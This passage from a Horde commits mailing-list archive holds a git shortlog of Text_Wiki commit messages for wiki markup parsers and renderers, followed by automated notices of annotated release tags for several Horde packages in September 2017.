specs changed version to 0.4.1 ordinal numbers are automatically superscripted (1st, 2nd etc.) bug-fix:
now out of

2 backslashes are needed bug-fix: text defaults to url comment about newlines changed version to 0.4.2 removed htmlentities output goes through textEncode question mark for ungreedy regexp include trailing braces allows specifying class in options allow specifying a class in conf - if a class is specified, no style is inlined aligning to creole 0.5 aligning to creole 0.5 + additional markup fixed url/wikilink priority problem support for %%% aligning to creole 0.5 + additional markup email style emphasis allows specifying class in options removed notice about undefined name removed notices about undefined index removed notice about undefined variable removed notice about undefined index removed notice about undefined type (in renderer) removed notice about undefined 'css' index removed notice about undefined 'type' index various ways to escape end of section removed notice about undefined variable removed notice about undefined variable escape repeated char allow numbered lists restoreraw support escape of closing sequence improve single / emphasis detection improve single _ underline detection improve single * strong emphasis detection upgrade to Creole 1.0 specs upgrade to Creole 1.0 specs Box (div) for footnotes Box (div) for footnotes accept bold par after list *** empty log message *** added support for deflist free urls can be escaped by a tilde single slash parsing moved to Italic.php single star parsing moved to Bold.php single underscore is now disabled removed warning about undefined caption removed warning about undefined alt text enclose block-level images in a table enclose block-level images in a table allow tildes in image urls don't escape alphanum chars, it's not consistent with urls *** empty log message *** using 'empty' to avoid notices Fixed priority among images urls and tables (about pipe) Commented out wrapping of images in tables Avoid handling images which include other markup fixed bug preventing urls to be used in tables fixed bug preventing urls to be used in tables minor - indent bug fix - decimal numbers at beginning of line resulted into numbered list element reorganized superscripting of ordinal numbers "No linebreaks are allowed within headings." (From specs.) Moritz Venn (28): Rendering Fix for Tables (Missing Whitespace) Add new Parsers for Text_Wiki_Mediawiki File did not differ from the one in Default. Adding package.xml for Text_Wiki_Mediawiki Use Tikki-Wiki List-Parser for now, as it uses the same syntax. First Version of a Mediawiki Deflist-Parser. Contains a few known Bugs. Correct Cell-Parsing (#7392) Fix Anchor in Wikilink Follow Mediawiki markup standards with single newlines (#8174, thanks Brian Sipos) Add Code- and Tt-Rule (thanks Brian) Add Sub-/Superscript rules Lists can now skip levels up AND down Fix Bug #8402 (thanks brian) Fix Bug #8449 (thanks brian) Fixed Headers, Added Preformatted rule (used Brian's syntax for this one) and fixed resulting Bug #8448 Fix Bug #8496 (thanks Brian) Implemented Request #8451 (thanks Brian) Fix Bug #8501 (thanks Brian) Fix Bug #8505 (thanks Brian) Add file:// protocol to Url-Parser, will most likely be added as an option later on (as in Mediawiki). Closes #9383 dunno if someone ever used this, but has been broken for quite some time. Fix #11578 by adding

 to Syntax of Code and switching Parsing order with Preformatted
      Implemented #9378
      Fix #8450 and probably receive a bug-report for it :-)
      Implement #8503, thanks Brian
      implement fr#16055 (include brackets in url regex)
      implement fr#14348: allow width/height for images
      fix #12825: remove helper code which looks unneeded to me

Paul M Jones (136):
      initial add to PEAR
      somehow, an earlier version of Text_Wiki was added to PEAR CVS; this commit reflects the 0.14 version, which should have been imported in the first place.
      updated to reflect 0.15 release
      udpated with changes for 0.15:
      removed extra lines for nonexistent files
      removed trim() from line 106 to leave leading and trailing white space in place in the output
      started new release, not sure if it will be 0.15.1 or 0.16.  Noted "code" rule change about white space.
      no longer need to smash list items together on sequential lines. you can have any number of blank newlines between list items and stay in the same list.  this improves source readability.  however, if you start a line with a non-* non-# character non-whitespace character, that counts as a new paragraph.
      now can separate list items with newlines and you stay in the same list
      added extra newline to returned text so as not so screw up paragraphs
      fixed bug 1362, accented letters not translated to HTML entities.
      fixed bug 1384, list rule inaccurate.  Have implemented the "display: inline" style fix noted by Mike.  Not really happy with this for the long term, but it will do for now.  In future, will attempt to rewrite the "list" rule to be more semantically accurate.
      process() returns two newlines after the table, not just one, to help with parsing paragraph breaks
      can now set rule conf key 'images' to turn image processing on and off (defaults to true/on)
      added renderPlain() stub method
      updated comments, brought package.xml up to 0.16, added renderPlain() methods, added newlines tailing deflist and table. updated comments.
      added getConf() method to safely access config key values
      added conf key 'numbers' (set to true if you want to allow numbers as lower-case letters in the regex).  also added number-based regex as an alternate when 'numbers' is true.
      added "'numbers' => false" in the wikilink conf array; it's false by default to maintain previous behavior.
      added newline before and after returned text to help with paragraph parsing
      udpated with proper date
      updated version number to 0.17
      removing files in preparation for MAJOR RESTRUCTURING of the directories
      Major restructuring of all Text_Wiki parsing and rendering rules is reflected by the addition of theses files.
      updated Wiki.php to match the new directory structure
      added date to the release
      moved and commented on the $_dirSep property
      fixed insertRule() so that it inserts properly when a second argument is passed
      no changes in list.php
      fixed bugs 1571 and 1573
      updated to 0.19.2
      fixed bug 1616
      per note from Stephane Solliec, images now always render with an "alt" attribute
      image now accepts URLs in "link" attribute
      updated to 0.19.3 version number
      apply htmlspecialchars() to $href, $target, and $text
      apply htmlspecialchars() to $href and $text, apply urlencode() to $page
      fixed bug 1628
      * Fixed bug 1628 (encoding of URLs and freelinks)
      updated to 0.19.4 with changes and date
      added "anchor" rule for parse and xhtml/render
      fixed bug 1722 (can't use two instances of Text_Wiki)
      fixed bug 1709 (interwiki targets are invalid)
      updated for 0.19.5
      removed '#' scheme support for same-page anchor references, also added a ':' to the mailto scheme
      updated to 0.19.6
      for minimal XHTML compliance, the target attribute is left out by default (it used to be 'target="_blank"' by default, which is not XHTML 1.0 Strict compliant)
      updated version number, added change note about URL targets
      updated version number
      added renderer Plain for plain text
      added Plain renderers
      updated to 0.20 version number
      updated with 0.20 release notes and files
      changed to 0.20.0 (three numbers not two)
      removed bad copies of Xhtml and Plain dirs, will replace
      added Plain renderer files
      re-added Xhtml renderer files
      updated with 0.20.1 release notes
      for deflist, must now use ": " (colon-space) at beginning and " : " (space-colon-space) to separate term from def; this it becuase URLs as terms were breaking the rule
      applied fix for bug 2095, CSS not honored in deflist rule (thanks for the patch,  glamm at a-s-i dot com)
      updated release date
      updated version number
      added comment to credit contribution from Stephane le Solliec
      URL "target"s are now XHTML compliant with suggestion from Aaron Kalin and JS code from youngpup.net
      add 'id' attrbute to token; this will let us generate better tables of contents
      added id_prefix conf element
      continued working with new Heading and Toc rules for better, faster tables of contents (XHTML-compliant "div" support)
      changed version number in Wiki.php, continued tweaking Toc rendering and parameters
      now guesses width and height, and adds a pseudo-center alignment option (thanks Stephane Solliec)
      added formatConf() method to wrap a config value in an sprintf() format string (thanks Bob Glamm)
      added 'css' conf key (thanks Bob Glamm)
      * Base Render class now has formatConf() method to wrap a config value in an sprintf() format
      * Render rules for Wikilink and Freelink are much more configurable: put new-link text before or after the page name, or use CSS only to control the look of new-links
      perfected the patches from Stephane le Solliec, image size guesses now work properly with non-local images
      fixed bug 2316: swapped processing order to Center and Newline
      finished "perfecting" CSS and linking in the Image rule
      updated comments, put in release date
      added note about Toc generation
      added keys for column and row counts in the 'table_start' token (to support LaTeX rendering)
      removed 'translatehtml' rule from the parse/render rule set; it is more appropriate for HTML translation to be part of the Xhtml "format" than a general processing rule (particularly when we start doing LaTeX and other non-HTML formats)
      added HTML translation as part of the pre() method
      Wiki.php: whitespace changes
      Jeremy Cowgar has kindly submitted a prelminary LaTeX renderer.  Thanks, Jeremy!
      added change note about Latex renderer, added Latex format class and render classes
      converted tabs to spaces in all files
      added Function rule
      added Function rule for parsing and rendering
      Wiki.php: fixed bug 2419 for getParseConf(), fixed similar bug in getFormatConf()
      changed version number
      removed Translatehtml rules; this is XHTML-specific, and so belongs in Format/Xhtml.php, not a parse/render rule pair.
      added shortcuts for line keys ('a' for 'access', 'p' for 'param', etc)
      major changes to XHTML renderer for 'Function' -- has complete format control now, not just CSS
      removed 'JEREMY' output in Tighten, changed not-implemented message in Function
      added full output for plain text on the Function rule
      added comments, converted tabs to 4-spaces
      added changes for new release
      changed version number
      removed extra trailing single-quote, per Bob Glamm
      removed extra single-quote in Anchor, minor change Strong and Emphasis regex so they work inside Colortext properly
      fixed bug 2670, new links now get 'css_new' class (not 'css' normal class)
      fixed bug 2916 (parser for "code" does not set all attributes)
      added feature 2971 (allow dot in interwiki rule) patch from Lukas Smith
      extended regex to allow for more page-name characters
      added conf key 'exists_callback' to allow users to specify a callback function to tell whether a page exists or not.
      gets a reference to the callback config instead of a copy, because the callback may be an object
      changed line indenting
      added change notes and new release date, moving to "beta"
      finalized for release
      fixed Bug:3336
      moved all default pareing rules from Text/Wiki/Parse/ to Text/Wiki/Parse/Default/.
      added lookahead assertion that first character is not a colon; it was messing up such markup as Package::methodName() because a colon is allowed in the page-name.
      updated version number
      added change notes
      updated comment blocks, changed version number
      fixed bug 3387 (mailto link includes javascript).  mailto links no longer include javascript window-targeting code.
      now supports an optional extended character set for wiki page names; umlauts and
      added url_base conf option
      added broad swaths of docblock comments
      removed @package_version@ from sub-files, updated release info in package.xml
      more change notes, changed version number
      added subscript parsing support
      added subscript rendering support
      added subscript support
      fixed bug 3004 (Wrong path for rule "image") -- patch provided by reg at dav-muz dot net
      changed release date
      first stable release
      added charset and quotes support to html translation (changed internal algo
      fixed bug 3959, "XHTML lists not rendered according W3C Standards", where
      as part of fixed bug 3959, "XHTML lists not rendered according W3C Standards" (where
      added a 'collapse' key to collapse the div horizontally within a table; this
      parser returns an extra newline before the replacement to comply
      updated with bugfix change notes
      fixed bug 4175 "Wrong transform method" by generating PEAR_Error objects
      * applied feature request 4436 "Add option to getTokens to get original token indices" -- now the return array from getTokens() is keyed to the original token index number.
      Fixed Bug #4473 Undefined variables in error()
      fixed bug 4474 to silence calls to htmlentities and htmlspecialchars so

Remi Collet (1):
      Cleanup some license headers

Rodrigo Sampaio Primo (52):
      Bug #9154: token() method for class Text_Wiki_Render_Tiki_Paragraph implemented
      Bug #16322: properly url rendering
      Feature request #16315: class Text_Wiki_Render_Tiki_Preformatted implemented
      add Creole to the list of parsers and renders
      add new tests using PHPUnit
      Properly rendering of Tiki heading
      Warning message about the need of magic_quotes_gpc = Off
      Text_Wiki_Render_Tiki_Image can render images without additional parameters
      Added tests for all Tiki Render rules
      Fix Text_Wiki_Render_Tiki_Code
      Renaming tests files
      Fix: = heading = is a valid MediaWiki syntax
      adding files to .cvsignore
      Adding first tests to Text_Wiki class
      Fix specific case of Tiki rendering of wikilinks
      More tests to Text_Wiki_Parse_Mediawiki
      Removing unnecessary tearDown() method from test class
      More tests for Text_Wiki
      Adding tests for the Text_Wiki_Render class
      Fix tiki definition list render
      Implemented one more Text_Wiki_Render_Tiki test
      Two more tests to Text_Wiki core class
      Text_Wiki tests now can run from any directory
      Add Text_Wiki_Parse_Mediawiki_Redirect and Text_Wiki_Render_Tiki_Redirect
      Tests for the Mediawiki wikilink parser
      Tests for the URL parser of Mediawiki
      Tests for the rules raw, preformatted and emphasis of the Mediawiki parser
      Tests for the rules raw, preformatted and emphasis of the Mediawiki
      Starting tests for the Text_Wiki_Parse_Tiki
      just indentation (removing tabs and aligning)
      Fixing tiki render for deflist
      Text_Wiki_Render_Tiki_Deflist now support definition list without definition narrative
      Tests for mediawiki rule list parser
      Mediawiki rule list does not consider redirect rule as list
      changed the fixture for testing the parser of mediawiki list
      Bug #16455 - proper parsing of Mediawiki bold and italic (using algorithm from Mediawiki parser)
      Proper Mediawiki parsing and Tiki rendering for heading (fix problem with linebreaks)
      Adding new line at the end of Tiki list rendering
      Add prefix option for the configuration of the Tiki Image Render
      Improve Text_Wiki_Render_Tiki_List
      Another tentative to fix heading parsing and heading from Mediawiki to Tiki
      Converting Text_Wiki_Tiki and Text_Wiki_Mediawiki to 2.0 of package.xml
      Updating the list of Text_Wiki_Mediawiki files on the XML and adding myself as one of the developers
      Updating the list of Text_Wiki_Tiki files on the XML and adding myself as one of the developers
      Removing obsolete test file
      Removing unused file
      Using a simplified syntax for rendering Tiki redirect
      Preparing new release of Text_Wiki_Tiki and Text_Wiki_Mediawiki
      Just avoiding undefined offset notice on Mediawiki wikilink parser
      Just avoiding generation of php undefined index, offset or variable notices
      update Text_Wiki_Render_Tiki_Redirect to use new Tiki redirect syntax
      adding missing files from previous commit

Till Klampaeckel (12):
      * tests.php >> AllTests.php to follow PEAR convention
      cs
      * include config.php (if available) allows us to run 'phpunit AllTests.php' as well
      whitespace foo
      * add testcase for bugs, #18289
      * test seems to work standalone only
      * added __construct() for PHP5
      * applied patch from #18289, thanks yunosh
      * added BugTests (work in progress)
      * added appropriate require_once calls, #14604
      * bugfix for #11649: regex updated (from Horde, thanks yunosh)
      fixture and test for #11649

bertrand Gugger (222):
      So we can play with it (dev copy), that will constitute next test/*.phpt too,
      Creating the Text_Wiki_BBCode parser, it's a working copy, CS to be fixed
      Comment: We match either [color..] or [/color], will be post synchronized
      bad commented as // made a ?> from string becoming effective end php tag !
      Made Font accepting nesting
      Fixed Code recursive regexp
      Fixed docbook headers, hope that is conform ! Set the BBCode rules list
      Ooops, sorry, closing bracket got eaten
      Thanks toby, opening bracket for function/method must be on next line
      align dockblock comment stars
      require_once without parenthesis
      Headers + post synchronization transmits nesting depth
      Headers, nesting depth for synchStartEnd() and return null
      Class header, calculate offset if synchStartEnd() changes source + error return
      Headers
      Class header
      Headers
      SynchStartEnd() with nesting depth and return null
      Request #4520  	Additional space confuses image tag, adapted regexp
      Request #4634  	Code block title/filename, uses conf css_filename
      sorry, forgot debug output
      some more tests
      Headers
      Initial version of quoted blocks for BBCode
      Initial version of code rule parser dor BBCode
      Include inherited class !
      Sorry for the last empty line and . without spaces
      No more ugly include, actually rendering latex,
      Corrected inherits
      Latex renderer for font rule
      Test data completed ,
      Removed "ugly" dirname() in require_once
      No more change include path, check running on command line if 'cli' ... and more
      Enabled the default Paragraph rule
      Ouch !! Simple quotes don't interpret variables, mea culpa
      Some more cleaning, introduced CSS
      Typo
      Plain Font rule renderer
      List rule with double staged recursive preg_replace_callback()
      Don't catch the '=' if optional numbering
      Wikiplugins starts anywhere, not necessarly on begin of line, simplified the regexp
      A true test === for translate format conf is enough and works now !
      Plugins produce wiki markup so are processed by parsing, no tokens produced
      The rule take care of nested plugins, the plugin processing is done by parsing as
      Cleaning headers before to bundle in tikiwiki
      headers
      headers
      headers
      Fixing back justin's commit by synch with tiki
      A new rule introduced by tiki for drawing boxes
      Synching back justin's commits from tikiwiki, that's all what is ok,
      Synch back justin's commit in tikiwiki
      Introduces tikiwiki/justin's collapsing in headers, needs some refactoting though
      4 new rules introduced for tiki
      Headers ... ouf !
      Headers
      Revamped the nesting in parse to catch orphans start or end tags
      Made the parsing recursive
      ooops , sorry debug trace ...
      Fixed comments
      Making the rule recursive
      Making rule recursive
      As rules are now recursive, no more need to extend Parse class
      Moving BBCode to standard dirs
      It's in standard Text/Wiki/Render/Xhtml now
      It's in standard Text/Wiki/Render/PLAIN now
      It's in standard Text/Wiki/Render/Latex now
      Moving BBCode parser to standard directories
      Now in standard Text/Wiki/Parse/BBCode
      Let's start a PEAR::Text_Wiki_Pedia
      Sorry, the wiki is Mediawiki ... not Wikipedia
      Sorry, it's now in Text/Wiki/Parse/Mediawiki/
      Base class for Mediawiki parsing
      Extending the list of parsers and renderers available
      Fixed comments and headers
      Wrong @see in headers
      As the parser is now "standard", no need to require Text/Wiki/Parser.php
      Fixed the parse Addpath, removed the render one
      Makes the 2 [url.. syntaxes and inline urls, emails to come
      Implemented the config for refused schemes and disable inline urls
      Integrated [email] markup and inline emails
      Images with schemes, extensions, urls and local path configs
      Some more tests for URIs , mails and images
      Ooops ! forgot some debug output ...
      Fixed comments and wrong cvs Id
      :-o The most important was missing in Text_Wiki ! Smile ! :-)
      Enabled the Smiley rule
      Fixed an inversion in left handed smileys, does not catch anymore the boundaries
      Smiley plain renderer :)
      Smiley Latex renderer :)
      Smiley rule Xhtml renderer :)
      Typo
      Comment
      Removed the Specialchar rule as Smiley is now in
      Option with _ instead of -, misplaced docbook tags
      Config keys with _ instead of - , misplaced docbook tags
      Simplified configuration
      More simple and user friendly
      Full compatible with HTML_BBCodeParser, configuration summarized thru in file
      Disabled all rules not yet existing,
      A first implementation, span and row_span to follow ...
      Implicit start of row after start of table same, implicit cell after row ...
      Fixed the header optional attribute for cells
      Caption and free format
      Missing rendering rule in Latex and Plain
      Better use the \caption{...} command
      Missing rendering rule in Latex and Plain
      Missing rule in Latex and Plain
      Missing rule in Latex and Plain
      Missing rule in Latex and Plain
      Missing rule in Ltax and Plain
      Rowspan, colspan and avoid empty cells
      Emphasis needs Strong
      Rowspan and space before free format
      Colspan and rowspan also recognized without quotes
      Missing rile in Latex and Plain
      Excluded > from path
      Secured links on images, don't accept Wikilinks if disabled
      Completed notes, files and maintainers for the release 1.0.1
      Preparing first release of Text_Wiki_BBCode
      # is optional for hexadecimal colours
      Output the source of the image
      Bug #5397 variable used inside single quotes bugs WikiLinks
      Preset $collapse to null, sorry for non Tiki users
      Unitiliazed row and column 's spans when coming from bot mediawiki parser
      > is already > , too much gready on the non quoted args
      Phplookup and Function rules aren't used by Tiki
      As Plugin may introduce some more markup, raw and preformated had to be done in the same "round"
      Function and Phplookup rules aren't used by Tiki
      Documentation
      Tiki people may also smile :)
      Obviously, the # is to be kept in the anchor option, #5660, merci jeremy Lecour
      onclick in lowercase for Xhtml compliance (Bug #5847)
      Don't mix bullet and numbered lists when following each other
      Ooops ! debug output, sorry
      Option relative_enable default false for relative urls (Request #5767)
      Added more tests for url, email, lists and xss craps
      Prepare release 0.0.2 (alpha), changelog, added firman as lead,
      Render enumeration type a, A, i, or I
      Fixed enumeration type [list=A] (as html type: a,A,i or I)
      Prepare release 1.0.2 (stable) changelogs and BBCode dependency on this release
      Mixed list ends only if the other kind of list starts at first level but may contains sub-lists from the other kind (Bug #5879)
      Back release 1.0.3 (stable) late update in Default list parser intoduced a BBC
      Notice: Only variables should be assigned by reference (bug #6010)
      Only variables should be assigned by reference (bug #6010)
      Corrected example loader, htmlspecialchar the source
      seems I forgot the release date, anyway thanks ritzmo
      Added Ooo , Pdf and Docbook in renderers to be tested, would be better to have free input.
      Very sorry, forgot Text_Wiki does not use PEAR
      Add the Wilink rule (#6623)
      Spaces around headings are not mandatory (#6623)
      Handles errors more nicely (Text_Wiki includes PEAR only in that case)
      Let each php error display
      Starting the DocBook renderer , caution, only an half is yet ready,
      urlencode() the page name and anchor as they are used in the query part of the url
      #6623: missing quantifier '?'
      A space is enough to delimitate a heading, no need for a linefeed (#6623)
      Some more rules , 35/45 done ...
      3 more rules (84%)
      Piano ma sano (hopefuly) going on ...
      Arrange comment
      Autofind parser in test files must be case sensitive
      Swallow away line breaks within the lists
      Page names must be urlencoded in the query, not htmlspecialchared (may contain spaces)
      the 38th rule ...
      The basic (now empty) basic Render class for Docbook
      Updated changelog , prepare release
      Correct changelog
      Makes the sectioning configurable and the section levels sequential
      Empty section in configuration strips the sections for a level
      A method for cms needing several parsing in a session,
      Abstract encodings for text and urls, prepare #5953 cleaning
      Wrapping the urlencoding
      Overwrites and uses textEncode() for text translation
      Common text encoding (#5953)
      Default text encoding to htmlspecialchars
      Use text encoding wrapper
      It's not Bold produced by Emphasis, but Strong, and only by rendering:
      The overwrite of getTokens() method is no more needed since rev. 1.31 of Wiki.php
      The overwrite of getTokens() was not needed and even dangerous ...
      Correct the key used in changeRule(), ensure no double new rule.
       ...  may be multiline
      The Jaws guys said we eat too much memory :( Load render objects only if needed :)
      Base Wiki extensions were forgotten for Cowiki and Doku parsers
      No more need to fake a Strong parsing rule since Render loads dinamically
      Prefer rawurlencode() to urlencode() to get %20 and not + for spaces
      ROLLBACK
      Cut out "?>" php tails, preg_replace('#\?>\s*\Z#ms', '', $script);
      Cut php tail "?>"
      Wikilink also process Image and Interwiki (empty for now)
      Correct the prefixes handling
      Allow parsers to give the full url in token options instead of the site + wiki page
      Allow parsers to give the full url in token options instead of the site + wiki page
      Complete the rendering with indication of (url) or (site:page)
      Allow parsers to give the full url in token options instead of the site + wiki page
      Process interlangage only as an Interwiki
      Image and Interwiki are now done by the Wikilink rule
      Take align attribute (left, center, or right) as piped after the | in image tag
      Start release preparation
      Put bases for the release, more details to come, release is not ready
      That should be all for now. Expected release is 1st of March.
      Change misleading method name
      Reordered the changes, factory() introduced
      Push release 1 day
      We just need to die if required sub package is not there
      Variable Substitution Bug #7091 (thanks randlem at bgsu dot edu)
      Prepare next release 0.1.0
      Update summary and description.
      We release today
      Thanks to Daniel , some better english ,
      Optimists hope it's the last typo , let's go , thanks for help !
      Ooops ! Forgot to commit Deflist addition . This is correct in the release 0.1.0
      Many thanks for the great experience.
      Back lead , we need to kill recursive (?R)
      a test for [list] in BBCode subdir (inspired from Creole)
      Back lead
      In case of url with description, let the description parsable (#9393)
      a !empty() intead of array_key_exists() , maybe dangerous
      Prepared release , bug fixing and warning people about pcre's limitations.
      Generated with pear convert , back added cvs tag , removed php dependency
      pear package needs the php dependency, put it back
      #10148 Simplify the row regexp to work with new PCRE, thanks Mark Wiesemann for the testing and support

till (2):
      Enhancement: composer setup
      Enhancement: composer setup



From jan at horde.org  Tue Sep 19 12:13:03 2017
From: jan at horde.org (Jan Schneider)
Date: Tue, 19 Sep 2017 14:13:03 +0200 (CEST)
Subject: [commits] Horde annotated tag horde_cssminify-1.0.4 created.
	777e7c52131d0b64f82ecf10a0324222d9143274
Message-ID: <20170919121303.31E14100AAE@spencer.horde.org>

The annotated tag "horde_cssminify-1.0.4" has been created.
        at  777e7c52131d0b64f82ecf10a0324222d9143274 (tag)
   tagging  5becfab05bc431c960b74dcd636eb2ac149e10ff (commit)
  replaces  horde_crypt-2.7.10
 tagged by  Jan Schneider
        on  Tue Sep 19 10:37:45 2017 +0200

-----------------------------------------------------------------------
Released Horde_CssMinify-1.0.4.

Jan Schneider (2):
      Development mode for Horde_Crypt-2.7.11
      Released Horde_CssMinify-1.0.4



From jan at horde.org  Tue Sep 19 12:12:58 2017
From: jan at horde.org (Jan Schneider)
Date: Tue, 19 Sep 2017 14:12:58 +0200 (CEST)
Subject: [commits] Horde annotated tag horde_crypt-2.7.10 created.
	958a966278d2530ace4f6bedb3ac609041def4a4
Message-ID: <20170919121258.CA628100A27@spencer.horde.org>

The annotated tag "horde_crypt-2.7.10" has been created.
        at  958a966278d2530ace4f6bedb3ac609041def4a4 (tag)
   tagging  8f8acedc7a5a9cef72d8ffd390060e5ca2736787 (commit)
  replaces  horde_browser-2.0.15
 tagged by  Jan Schneider
        on  Tue Sep 19 10:31:41 2017 +0200

-----------------------------------------------------------------------
Released Horde_Crypt-2.7.10.

Jan Schneider (2):
      Development mode for Horde_Browser-2.0.16
      Released Horde_Crypt-2.7.10



From jan at horde.org  Tue Sep 19 12:13:08 2017
From: jan at horde.org (Jan Schneider)
Date: Tue, 19 Sep 2017 14:13:08 +0200 (CEST)
Subject: [commits] Horde annotated tag horde_editor-2.0.5 created.
	97f0514169a3c08b22851282ae9d3ea6907150ac
Message-ID: <20170919121308.280CF100A27@spencer.horde.org>

The annotated tag "horde_editor-2.0.5" has been created.
        at  97f0514169a3c08b22851282ae9d3ea6907150ac (tag)
   tagging  00fd27fe1acccdb441f501bb06e4d199f829f27d (commit)
  replaces  horde_cssminify-1.0.4
 tagged by  Jan Schneider
        on  Tue Sep 19 10:44:42 2017 +0200

-----------------------------------------------------------------------
Released Horde_Editor-2.0.5.

Jan Schneider (2):
      Development mode for Horde_CssMinify-1.0.5
      Released Horde_Editor-2.0.5



From jan at horde.org  Tue Sep 19 12:13:11 2017
From: jan at horde.org (Jan Schneider)
Date: Tue, 19 Sep 2017 14:13:11 +0200 (CEST)
Subject: [commits] Horde annotated tag horde_elasticsearch-1.0.4 created.
	f7ff83688670fd574b832cf99b747c3d86871bd0
Message-ID: <20170919121311.F1B71100AAE@spencer.horde.org>

The annotated tag "horde_elasticsearch-1.0.4" has been created.
        at  f7ff83688670fd574b832cf99b747c3d86871bd0 (tag)
   tagging  64da7ea130c6cab1a7d5ed99e3063d9f31c9801d (commit)
  replaces  horde_editor-2.0.5
 tagged by  Jan Schneider
        on  Tue Sep 19 10:51:00 2017 +0200

-----------------------------------------------------------------------
Released Horde_ElasticSearch-1.0.4.

Jan Schneider (2):
      Development mode for Horde_Editor-2.0.6
      Released Horde_ElasticSearch-1.0.4



From jan at horde.org  Tue Sep 19 12:13:15 2017
From: jan at horde.org (Jan Schneider)
Date: Tue, 19 Sep 2017 14:13:15 +0200 (CEST)
Subject: [commits] Horde annotated tag horde_imsp-2.0.10 created.
	10e26e61becbd63d569eee4185a64b654ead506b
Message-ID: <20170919121315.B65AB100A27@spencer.horde.org>

The annotated tag "horde_imsp-2.0.10" has been created.
        at  10e26e61becbd63d569eee4185a64b654ead506b (tag)
   tagging  03f19d2f606761dd7ef5fe39b40d087a09aec31e (commit)
  replaces  horde_elasticsearch-1.0.4
 tagged by  Jan Schneider
        on  Tue Sep 19 10:57:07 2017 +0200

-----------------------------------------------------------------------
Released Horde_Imsp-2.0.10.

Jan Schneider (2):
      Development mode for Horde_ElasticSearch-1.0.5
      Released Horde_Imsp-2.0.10



From jan at horde.org  Tue Sep 19 12:13:19 2017
From: jan at horde.org (Jan Schneider)
Date: Tue, 19 Sep 2017 14:13:19 +0200 (CEST)
Subject: [commits] Horde annotated tag horde_javascriptminify-1.1.5 created.
	84b679e24f1b3f1163dc83f761a6eecea39ace48
Message-ID: <20170919121319.8F600100AAE@spencer.horde.org>

The annotated tag "horde_javascriptminify-1.1.5" has been created.
        at  84b679e24f1b3f1163dc83f761a6eecea39ace48 (tag)
   tagging  62dc7741ed950f76f8e5a5a78ffc3ec00bdae006 (commit)
  replaces  horde_imsp-2.0.10
 tagged by  Jan Schneider
        on  Tue Sep 19 11:04:24 2017 +0200

-----------------------------------------------------------------------
Released Horde_JavascriptMinify-1.1.5.

Jan Schneider (2):
      Development mode for Horde_Imsp-2.0.11
      Released Horde_JavascriptMinify-1.1.5



From jan at horde.org  Tue Sep 19 12:13:23 2017
From: jan at horde.org (Jan Schneider)
Date: Tue, 19 Sep 2017 14:13:23 +0200 (CEST)
Subject: [commits] Horde annotated tag horde_oauth-2.0.4 created.
	3a567ef6ca034666f4eae3789ddbb3f5e8d319d1
Message-ID: <20170919121323.50797100A27@spencer.horde.org>

The annotated tag "horde_oauth-2.0.4" has been created.
        at  3a567ef6ca034666f4eae3789ddbb3f5e8d319d1 (tag)
   tagging  21119d6be25ae3ddd84ed7d180eafb054e35b6c1 (commit)
  replaces  horde_javascriptminify-1.1.5
 tagged by  Jan Schneider
        on  Tue Sep 19 11:13:31 2017 +0200

-----------------------------------------------------------------------
Released Horde_Oauth-2.0.4.

Jan Schneider (2):
      Development mode for Horde_JavascriptMinify-1.1.6
      Released Horde_Oauth-2.0.4



From jan at horde.org  Tue Sep 19 12:13:26 2017
From: jan at horde.org (Jan Schneider)
Date: Tue, 19 Sep 2017 14:13:26 +0200 (CEST)
Subject: [commits] Horde annotated tag horde_openxchange-1.0.1 created.
	4926be298923bbd796a7b469a95e8d4640e2f16a
Message-ID: <20170919121327.0DDEC100A27@spencer.horde.org>

The annotated tag "horde_openxchange-1.0.1" has been created.
        at  4926be298923bbd796a7b469a95e8d4640e2f16a (tag)
   tagging  e9d32906b68987115cadd97d1cd99aec673a0bec (commit)
  replaces  horde_oauth-2.0.4
 tagged by  Jan Schneider
        on  Tue Sep 19 11:19:36 2017 +0200

-----------------------------------------------------------------------
Released Horde_OpenXchange-1.0.1.

Jan Schneider (2):
      Development mode for Horde_Oauth-2.0.5
      Released Horde_OpenXchange-1.0.1



From jan at horde.org  Tue Sep 19 12:13:30 2017
From: jan at horde.org (Jan Schneider)
Date: Tue, 19 Sep 2017 14:13:30 +0200 (CEST)
Subject: [commits] Horde annotated tag horde_queue-1.1.5 created.
	d56dff91494ed63ea28ccfc32382eaefefe46342
Message-ID: <20170919121330.DC540100A27@spencer.horde.org>

The annotated tag "horde_queue-1.1.5" has been created.
        at  d56dff91494ed63ea28ccfc32382eaefefe46342 (tag)
   tagging  136c3610691cb95167823d183711deb81806a3f0 (commit)
  replaces  horde_openxchange-1.0.1
 tagged by  Jan Schneider
        on  Tue Sep 19 11:25:36 2017 +0200

-----------------------------------------------------------------------
Released Horde_Queue-1.1.5.

Jan Schneider (2):
      Development mode for Horde_OpenXchange-1.0.2
      Released Horde_Queue-1.1.5



From jan at horde.org  Tue Sep 19 12:13:34 2017
From: jan at horde.org (Jan Schneider)
Date: Tue, 19 Sep 2017 14:13:34 +0200 (CEST)
Subject: [commits] Horde annotated tag horde_scheduler-2.0.3 created.
	8115e7d1acc07e3aff29585c2eab3ef806402619
Message-ID: <20170919121334.8522E100A27@spencer.horde.org>

The annotated tag "horde_scheduler-2.0.3" has been created.
        at  8115e7d1acc07e3aff29585c2eab3ef806402619 (tag)
   tagging  48bbf192ac8b331fa7631387bdec3f77c2c61e73 (commit)
  replaces  horde_queue-1.1.5
 tagged by  Jan Schneider
        on  Tue Sep 19 11:52:54 2017 +0200

-----------------------------------------------------------------------
Released Horde_Scheduler-2.0.3.

Jan Schneider (2):
      Development mode for Horde_Queue-1.1.6
      Released Horde_Scheduler-2.0.3



From jan at horde.org  Tue Sep 19 12:13:38 2017
From: jan at horde.org (Jan Schneider)
Date: Tue, 19 Sep 2017 14:13:38 +0200 (CEST)
Subject: [commits] Horde annotated tag horde_scribe-2.0.3 created.
	872ef71525814d73098c5f4c9e93b09ec1d95617
Message-ID: <20170919121338.59E2F100A27@spencer.horde.org>

The annotated tag "horde_scribe-2.0.3" has been created.
        at  872ef71525814d73098c5f4c9e93b09ec1d95617 (tag)
   tagging  757dc5d01fbe3c710b59abe865028b0bbb13e0c5 (commit)
  replaces  horde_scheduler-2.0.3
 tagged by  Jan Schneider
        on  Tue Sep 19 11:59:18 2017 +0200

-----------------------------------------------------------------------
Released Horde_Scribe-2.0.3.

Jan Schneider (2):
      Development mode for Horde_Scheduler-2.0.4
      Released Horde_Scribe-2.0.3



From jan at horde.org  Tue Sep 19 12:13:41 2017
From: jan at horde.org (Jan Schneider)
Date: Tue, 19 Sep 2017 14:13:41 +0200 (CEST)
